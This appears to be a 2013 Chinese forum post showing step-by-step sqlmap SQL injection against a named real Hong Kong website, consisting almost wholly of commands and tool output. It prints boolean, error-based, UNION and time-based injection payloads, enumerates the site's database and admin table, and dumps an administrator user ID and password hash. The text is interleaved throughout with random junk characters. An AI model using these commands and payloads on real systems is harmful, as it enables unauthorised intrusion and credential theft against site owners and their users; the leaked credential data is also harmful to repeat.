找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2450|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ s/ L. o# S. n5 a- tms "Mysql" --current-user       /*  注解:获取当前用户名称+ l. o( X. a' {' p1 d5 H  `7 M
    sqlmap/0.9 - automatic SQL injection and database takeover tool
1 `, l" @( C  S0 S    http://sqlmap.sourceforge.net
  • starting at: 16:53:549 a$ y$ a& B# n1 r8 i! d4 M
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as$ z$ u; O( d7 M  L
    session file+ B6 ~8 L, o% T1 K, A  }: ~
    [16:53:54] [INFO] resuming injection data from session file3 x' f" N7 o4 @7 C9 d( A
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    0 i  R1 N. x0 W: L$ ^[16:53:54] [INFO] testing connection to the target url
    % W; h$ d" o0 [9 i" T& Usqlmap identified the following injection points with a total of 0 HTTP(s) reque
    % x  ~! c# o5 A3 |5 Dsts:
    # @8 l# G7 T' F4 R0 v4 S9 o---
    " n% v* T" X3 }' Z, VPlace: GET. l, _  `( o: p- m( \+ b/ u  R! ~% W
    Parameter: id
    % w+ ~; D1 M2 d6 F9 Q" E4 l9 O    Type: boolean-based blind% m, h' q4 I- u' _2 s( u' w, m' R
        Title: AND boolean-based blind - WHERE or HAVING clause
    , f7 I5 r: u4 ]/ _    Payload: id=276 AND 799=7998 C6 W( f/ v! J& P; W2 w) B. ?: i) k
        Type: error-based
    5 a. s# q9 U" Q- ?2 z' Y    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 q$ P7 a- b+ x# t- _
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& `! s# O$ m; y. r2 _9 u3 v
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    , U* l$ O& f: S, [0 d, O7 T8 K),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    & z+ J' I8 B. f! m6 h& C% T. D    Type: UNION query) f" W. a) O* e0 `; }5 V# a2 J. z  ]) w4 c
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    / W8 L) l) i6 {- [" s+ N( c- @    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) d' {( f" R9 W# Q* N# R
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),7 N( f/ M) x% D- I5 R, D
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ) t- q' d, m3 C8 @    Type: AND/OR time-based blind
    : P% t: b! `" u* c    Title: MySQL > 5.0.11 AND time-based blind  Y& U" _: u9 j6 v- A/ V+ }
        Payload: id=276 AND SLEEP(5)& N: K, o' j! D7 G; k' P  w
    ---
    7 A( w& `+ ~3 o; W7 }[16:53:55] [INFO] the back-end DBMS is MySQL
    ) j1 W' _* w. Wweb server operating system: Windows
    + z2 K5 M  ?- tweb application technology: Apache 2.2.11, PHP 5.3.0
    & |" a' @/ ]0 Q7 t% Pback-end DBMS: MySQL 5.0
    ! i; V% q: {& v; R[16:53:55] [INFO] fetching current user  @$ h8 Q  `6 l
    current user:    'root@localhost'   
    6 b! @! n0 l4 X1 E0 C[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou4 q5 Z7 K* t0 }. i, A6 g' `
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58, e, R: a* _/ e8 C) H4 ^# g

    ( O: M. ]0 [1 A1 f0 [1 w, xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    % F; w  O( R/ F. O1 {' b6 ^3 Mms "Mysql" --current-db                  /*当前数据库
    / g/ T+ W3 X2 I+ h: p5 m. B  H8 o    sqlmap/0.9 - automatic SQL injection and database takeover tool' A3 n  {9 w8 Z$ ]% m  k
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    5 `% ?3 H& v8 U0 N( B# t[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as3 T+ {' b' H! s5 S+ \: {
    session file
    1 h. w: E: Z% f( q[16:54:16] [INFO] resuming injection data from session file  T* g, d2 ?' k, l4 N
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ' h8 m6 z' u& |' o: u. \[16:54:16] [INFO] testing connection to the target url: I0 b# w5 u+ [  _8 b6 |
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque# i$ e' J0 v7 {3 t% @4 i4 g
    sts:& Y1 K7 f  i! K" U3 r0 o6 c6 g5 b
    ---: c! k, p' u' v, u3 R
    Place: GET
    % n' \: v/ F/ a( Q& VParameter: id; I. x8 p8 e) A+ k/ A% Q
        Type: boolean-based blind) e# }9 f: H7 m7 u7 S! t9 X
        Title: AND boolean-based blind - WHERE or HAVING clause; q1 X9 f) D' J/ }
        Payload: id=276 AND 799=799
    ! [/ f" U. z7 q5 v' K' D$ W    Type: error-based# z* k) j" E0 i7 N! r: U
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 d7 b. p+ D) N
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ W) i, {( P, I: m! |2 n# @/ E2 ]" m
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    + Y+ K# U9 W. w),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    3 O" z% M# p4 n- [2 B2 Q    Type: UNION query, J% t0 |# x5 w6 K/ B: t: E
        Title: MySQL UNION query (NULL) - 1 to 10 columns1 b, {$ F: s/ }
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR  }8 g3 D% f# z- N1 L; M! D% ^: D
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- \, n2 h% H8 F! y
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#9 Q5 R. Z; Z' b8 q( f3 q
        Type: AND/OR time-based blind
    5 Y" p2 k& J  X' I    Title: MySQL > 5.0.11 AND time-based blind8 r* i; N7 J( L( s
        Payload: id=276 AND SLEEP(5)( w$ D1 |" k# k  |
    ---
    3 n7 f5 Q1 {3 }0 D0 j1 z3 L. P! a$ a9 x[16:54:17] [INFO] the back-end DBMS is MySQL# y+ y: S1 X: e. Z
    web server operating system: Windows
    5 X# R" \) V0 H2 W5 xweb application technology: Apache 2.2.11, PHP 5.3.0
    3 f% o2 Y1 i6 |2 s" L# Q/ Vback-end DBMS: MySQL 5.09 @6 ^! I, B3 q; R0 K* b' T
    [16:54:17] [INFO] fetching current database, ]! {6 p& d& b2 S) q
    current database:    'wepost'
    ! z: N" ?- L$ U$ P2 x/ U* m! R[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou. d6 |9 G- b) ^
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    9 x/ ^4 n# H* M& [D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 M2 Q; T9 D1 V
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    / b- B8 c+ a8 N1 J$ h1 P    sqlmap/0.9 - automatic SQL injection and database takeover tool
    2 K6 m, I2 P# W3 V: S" p    http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    2 [3 w: Z+ o' w  W4 ]. l  f' g# _$ s5 n[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as" q/ ?3 k" L( P8 ?4 u0 R
    session file
    * E( r7 H" U" n6 [[16:55:25] [INFO] resuming injection data from session file! z4 e+ x  k# b0 \- x4 H
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file) |% J, c) i+ ?+ O
    [16:55:25] [INFO] testing connection to the target url7 Y9 ^  x3 E5 U- W, d5 o/ ^# D! q
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    . K% W2 n( C3 q" w: f' }  Ests:
    - K' J( h+ _( {' J! I' _4 ^---" a( h: Z8 c' {4 a; d$ Q
    Place: GET' n( G' a7 B. T8 j" @6 O
    Parameter: id7 H- y0 V8 X; s& T5 a) L: ~
        Type: boolean-based blind
    * w/ Q, L, D9 q; H0 e; T    Title: AND boolean-based blind - WHERE or HAVING clause1 H& Z* i/ y  F8 ^
        Payload: id=276 AND 799=7994 U4 n  Q8 z" ~
        Type: error-based8 X$ ~' M+ ?7 o" z* m" L' G
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% M" @6 @4 ^8 l8 s
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," O3 O6 B' c% \5 |; r7 p/ h
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: ]7 D: |* l3 X2 a* C  d# z
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    & H' B+ _2 @( }* g+ O. C    Type: UNION query
    0 N4 f, y% D# v" j; B$ A% X5 w1 e    Title: MySQL UNION query (NULL) - 1 to 10 columns
    : J. ^* u8 U5 {( e+ Z    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ; @. @0 V. i* ?0 \4 A0 J* c(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    2 F2 w: {% ~5 R7 B. t2 q- M, }CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ _! |2 A5 i5 `' d5 G( o' T
        Type: AND/OR time-based blind
    + R0 b$ K" _+ E    Title: MySQL > 5.0.11 AND time-based blind: q; c0 V. S# o& e
        Payload: id=276 AND SLEEP(5)
    - O8 x9 z" B8 U9 M7 F4 I: T4 ]---
    , S) \( e4 I# b! ]6 m[16:55:26] [INFO] the back-end DBMS is MySQL' N8 A2 x  p, K4 W% J2 x
    web server operating system: Windows
    9 j6 h0 Z8 \6 P0 n' Jweb application technology: Apache 2.2.11, PHP 5.3.0
    $ z+ B4 U% \7 _! c+ Jback-end DBMS: MySQL 5.0
    $ b* \) v' |! Q* T' b[16:55:26] [INFO] fetching tables for database 'wepost'
    . O* ]3 ^+ T. E- T6 l. w0 T[16:55:27] [INFO] the SQL query used returns 6 entries( V  y0 x3 @4 w4 I
    Database: wepost/ G' Q( g6 @) O/ T8 G; Y
    [6 tables]7 X7 }$ Q0 t: M5 R& B1 G$ g
    +-------------+
    ( a* q9 n% f! }! Y& z" O| admin       |- ~9 h% g. m+ p2 @
    | article     |# i! ?- D+ P) V8 x$ j/ G* n1 ^% B2 m
    | contributor |* r: M, ~( I, I7 I
    | idea        |
    ! Q; s1 B8 \  ?9 I+ b3 a& N: I7 ?% `4 ~| image       |  T! W, h. M9 R+ l
    | issue       |" n" h6 z% I  k9 d$ i9 o
    +-------------+
    9 F% E0 Y, F: H5 e[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    ( r% ?1 \/ B" Rtput\www.wepost.com.hk'
  • shutting down at: 16:55:33" A2 i9 Y& d/ ?1 {. _& \. c3 b
    " f- n# K7 a: \3 h8 v0 Y0 G
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db4 {$ k6 T* q6 e4 l% A0 f
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    2 x, G' B/ H5 g. q, u3 V' L    sqlmap/0.9 - automatic SQL injection and database takeover tool9 T8 R4 Y6 q/ P% n+ U0 v/ ^; f
        http://sqlmap.sourceforge.net
  • starting at: 16:56:067 I+ Q  e8 ~3 M  G4 H
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 A2 j5 K5 J9 D2 k/ ?
    sts:" t: w0 ]+ l# U
    ---1 c% @+ o, ]( ]6 F, f) K7 D( p$ r
    Place: GET- A" Z0 k# M4 r& |; l
    Parameter: id
    : B1 c' f  W( a% v. ?    Type: boolean-based blind
    & ]7 }3 B5 ?% g+ ~    Title: AND boolean-based blind - WHERE or HAVING clause$ S( J% x7 `' `, X
        Payload: id=276 AND 799=799
    9 s: a1 x" ~9 B- P    Type: error-based, ]$ R& l2 O1 Z. O7 O0 W* k
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 W% n5 h& d$ Y8 E! @3 E5 ^
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," }; |; N* @2 d: T) M4 Z
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    + o6 G' A8 a8 G1 ]! Q4 U9 ?),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 X% C  R' }5 I* \" |4 s
        Type: UNION query
    " y$ U7 x/ F' k7 D    Title: MySQL UNION query (NULL) - 1 to 10 columns1 A& p7 y3 k& A, p
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    + V3 m* C" D1 q* i& j(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," k0 N0 N" u' o! @& t, C( z/ ^
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ h: [$ @/ \& m6 f, i; k, _
        Type: AND/OR time-based blind
    8 O- t9 @  G# ~) A2 l    Title: MySQL > 5.0.11 AND time-based blind
    - D- {% @7 y; F4 ]6 i    Payload: id=276 AND SLEEP(5)! L% h" x( A4 @, w7 d
    ---5 j- U) P, i) O# H3 P
    web server operating system: Windows/ U, y0 W! r$ h
    web application technology: Apache 2.2.11, PHP 5.3.0
    2 N( ~7 @; K8 Y  f' K0 U- u3 Zback-end DBMS: MySQL 5.0
    & d4 S% o1 l. I" g[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se$ n! x9 n6 a- X0 X
    ssion': wepost, wepost" L7 P5 Z4 |" {5 E; ~
    Database: wepost
    4 }/ Y4 v. O: ~* b4 h6 G9 KTable: admin
    . [. P6 W6 L' F+ e, H[4 columns]2 H9 ^2 L) _/ e% v' q8 j0 ]
    +----------+-------------+# Z5 A9 j% V4 ], [/ D
    | Column   | Type        |
    6 P. [* x$ e( H9 g# {7 {% l- \! Q1 e+----------+-------------+; ^* n4 v( `3 y# g6 Q5 s# i0 p- b
    | id       | int(11)     |
    6 ~4 t0 [2 ]5 U9 c, r| password | varchar(32) |
    - \3 q5 b- K$ M$ K1 X/ s! _2 G| type     | varchar(10) |
      b" h! B: B5 b) C| userid   | varchar(20) |
    8 `3 \; j# p3 S& ?( y; N2 q! M+----------+-------------+  M) O' w; F5 y" ?/ {  B) y4 Y
  • shutting down at: 16:56:19) B2 [* _! P& d, Z  `% L/ z
    - K. r4 ?/ [- n* d) e# E
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    8 @# D; m) |1 e+ t* e! d+ ?4 O) }ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容' r, A' b- U/ B, P. `1 ~6 G& h! d* [
        sqlmap/0.9 - automatic SQL injection and database takeover tool; k, o, P; ?4 L& q* D% s
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14+ n- b' z: {. M* p
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque" L. j$ S% t+ B6 I& _
    sts:
    ; c1 ~" p: K3 K2 I3 h---
    2 J) J) }) p& u2 F- u; GPlace: GET+ v6 V# X) f4 G+ h0 V; R
    Parameter: id! \* E% }3 L; P
        Type: boolean-based blind
    3 x7 e. [3 F3 L0 y9 @    Title: AND boolean-based blind - WHERE or HAVING clause
    3 U! n1 \3 o8 W0 I    Payload: id=276 AND 799=7996 D8 y2 E3 i6 L1 y8 b: \
        Type: error-based, b  R8 E8 D+ s% V
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- x$ `! J- k' ?; K% W2 J+ J
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,/ U0 H: O4 U2 Y# y
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ! S0 f, U4 q" f),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 o5 r: G; q2 R! b! [
        Type: UNION query
    # N& E% B, v3 C. R8 Q6 A    Title: MySQL UNION query (NULL) - 1 to 10 columns
    4 l5 o* A8 T0 v    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
      c0 j4 ~0 \. f  y2 _  o# Z(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    . [' F6 J+ Q! |, c7 VCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 S: Q& m7 h2 i; g) r! ?8 H+ o
        Type: AND/OR time-based blind
    ( i0 r- |6 d' z3 d( a    Title: MySQL > 5.0.11 AND time-based blind
    # @: t; T' V/ E- W+ ]; N    Payload: id=276 AND SLEEP(5). ?, Y, H/ S% K0 v
    ---
    : x! ~5 }! H  K# [. [web server operating system: Windows5 @8 B0 p8 t% X, H
    web application technology: Apache 2.2.11, PHP 5.3.02 N. K' c2 \8 D. [" _: r
    back-end DBMS: MySQL 5.0- P) D4 p) ?/ b0 @, ?. |4 }
    recognized possible password hash values. do you want to use dictionary attack o
    . u: x6 q6 w: |n retrieved table items? [Y/n/q] y. Q& \' S8 @  B* \$ \. C
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    ' x9 O1 `9 G  Ido you want to use common password suffixes? (slow!) [y/N] y
      |  m1 z! [) g, mDatabase: wepost0 c0 p. b  A: D1 x
    Table: admin' J5 |7 o. L! P0 {! s: S
    [1 entry]+ ]$ Q: J, s/ i1 ~+ ^  X6 W; o
    +----------------------------------+------------+
    8 n- f$ h9 o$ a' E. e. j! ?! d$ W| password                         | userid     |
    / z# o" [: ]3 k+----------------------------------+------------+7 _& \0 P3 }% s% U% ?1 [
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    " y* ?) K6 ~; A/ J+ b0 J+----------------------------------+------------++ L, j; @( f' w* B! t4 k7 p
  • shutting down at: 16:58:14
    + k* O1 n5 n5 k5 c" B
    - m! G# _4 W0 Q0 l8 _5 mD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表